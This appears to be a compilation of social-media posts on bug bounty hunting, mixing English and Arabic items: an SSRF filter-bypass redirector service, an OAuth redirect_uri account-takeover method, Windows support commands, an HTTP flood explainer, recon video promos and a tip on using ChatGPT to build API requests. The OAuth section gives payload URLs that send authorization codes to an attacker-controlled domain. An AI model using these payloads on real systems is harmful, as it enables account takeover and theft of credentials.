Redirector for SSRF
https://t.co/nSEbteU8VW
Bypass regex-based filters redirecting your SSRF target to real payloads, cloud metadata, internal services, with extra tricks.
400+ entries, pick some or automate.
Copy the link, point your target at it, see what comes back.
ATO with Open Redirect
OAuth apps trust a registered redirect_uri to receive the authorization code after login. The problem: most servers only check that the value starts with the right domain, not that it matches exactly.
That loose check is the whole bug. No injection, no chaining, no race condition. Just a URL parameter most hunters skim past because it looks like config, not attack surface.
Once you control where the code lands, you control the account. The victim logs in normally, approves the app normally, and the code that should authenticate them gets handed straight to you instead.
Pixiv paid $2,000 for this exact class of bug. Bounties for redirect_uri bypasses commonly land between $1,000 and $5,000 depending on impact, and it shows up across major platforms including Slack and Instagram.
How to spot it: grab the authorization URL, change redirect_uri to a variant of the trusted domain you control, see if the server still issues the code.
Replace AUTH_TARGET with the authorization server, APP_TARGET with the app's registered domain and ATTACKER with a domain you control, then test each payload below.
=> Payload, original request:
https://AUTH_TARGET/authorize?client_id=APP_ID&redirect_uri=https://APP_TARGET/callback&response_type=code
=> Subdomain trick:
https://AUTH_TARGET/authorize?client_id=APP_ID&redirect_uri=https://APP_TARGET.ATTACKER/callback&response_type=code
=> Path-based open redirect on the legit domain:
https://AUTH_TARGET/authorize?client_id=APP_ID&redirect_uri=https://APP_TARGET/redirect?next=https://ATTACKER&response_type=code
If the flow completes and the code lands on your domain, the app is vulnerable.
Just recorded as session with @GodfatherOrwa about his amazing recon mindset in bugbounty , we talked about recon internals and what to do and what to not in 2026 in recon, BIg thanks Orwa .
Watch the full 1h.5 Session here on my channel 😃 : https://t.co/DRMkzivn7N
https://t.co/pGgequAQ8k
This is the longest and most in-depth article I’ve published on Medium so far. It covers IIS and ASP dotNET vulnerabilities from absolute basics to advanced techniques. Even if you have zero background in IIS, you’ll be able to understand the fundamentals and move toward practical, real-world testing by the end.
🧰 Practical IT Support Commands أوامر دعم فني لازم يعرفها أي مبتدئ (Windows)
* كيف تشغّل الأوامر؟
- افتح نافذة التشغيل: Win + R ثم اكتب الأمر واضغط Enter .
- أو افتح موجّه الأوامر CMD: اضغط Start وأكتب cmd ثم اختر Run as administrator (كمسؤول) للأوامر اللي تحتاج صلاحيات .
🧊 When the PC is Slow or Freezing (بطء/تهنيق):
* temp - تنظيف ملفات النظام المؤقتة
* %temp% - حذف ملفات المستخدم المؤقتة
* prefetch - حذف ملفات البرامج المخزّنة (cached program files)
* cleanmgr - تشغيل Disk Cleanup
* taskmgr - تحديد من يستهلك CPU/RAM
* services.msc - إدارة تطبيقات/خدمات بدء التشغيل
* sfc /scannow - إصلاح ملفات النظام التالفة (نفّذها عبر CMD)
* chkdsk /f - إصلاح مشاكل القرص (نفّذها عبر CMD)
🌐 When the Internet isn’t Working (الإنترنت لا يعمل):
* ping <IP/website> - اختبار الاتصال
* ipconfig - عرض معلومات الشبكة
* ipconfig /release & /renew - تحديث/تغيير عنوان الـ IP
* ipconfig /flushdns - مسح DNS cache
* nslookup <domain> - فحص حلّ DNS للدومين
* tracert <domain> — تحديد نقاط انقطاع الاتصال
* netsh int ip reset - إعادة ضبط الشبكة (Network stack reset)
#ITSupport #Windows #Networking #SysAdmin
👾هجوم HTTP Flood؟
نوع من هجمات DDoS
يرسل المهاجم طلبات كثير إلى السيرفر
الجزء المخيف؟ الطلبات تكون كانه مستخدم حقيقي يقوم بتحميل صفحة ويب
لكن السيرفر يستمر في محاولة الرد... حتى نفاذ الموارد ويتباطأ أو يتعطل
و اتمنى من الله انكم استفدتم (تفاعلك يساعد غيرك)🤎
وتابع @x0D7M
الجزء التاني من الـ Information Gathering (eJPTv2) نزل! 🎯
هنعرف إزاي نجيب الـ Subdomains المستخبية، نكشف الـ WAF، ونفرتك الـ DNS بأقوى الأدوات (Subfinder, dnsrecon, https://t.co/Kd7UR6boqm).
📺 شوف الفيديو من هنا:
https://t.co/XSXVfIj0h3
Bug Bounty Tips: Extract API Endpoints and Construct Complex HTTP Requests from JavaScript Files Using AI
Stuck analyzing complex JS files while manually hunting on a target and can't figure out how to construct those GET/POST requests? 🤯 No fancy tools needed!
👉 Quick tip: Copy the JS file from your Chrome Dev Console, save it locally, and upload it to ChatGPT. Use this prompt:
"Could you read this JavaScript file and help me construct GET/POST endpoints?"
Then, ask for specific requests like:
"Can you help me construct the API request for getUserDetails with a raw HTTP example based on the JavaScript file uploaded?" and other similar questions based on the functionality you're looking into within the JavaScript source code.
You’ll be amazed by the results as ChatGPT constructs these complex GET/POST requests with parameters based on the AI code review—making what seemed impossible at first glance possible! 🚀
Once you have this information, you can start manually testing the endpoints with your cookies to test for IDORs, SQLi, CSRF, Privilege Escalations, XSS, etc.
#BugBountyTips #SourceCode #Infosec #HackerOne #BugCrowd 🕵️♂️🎯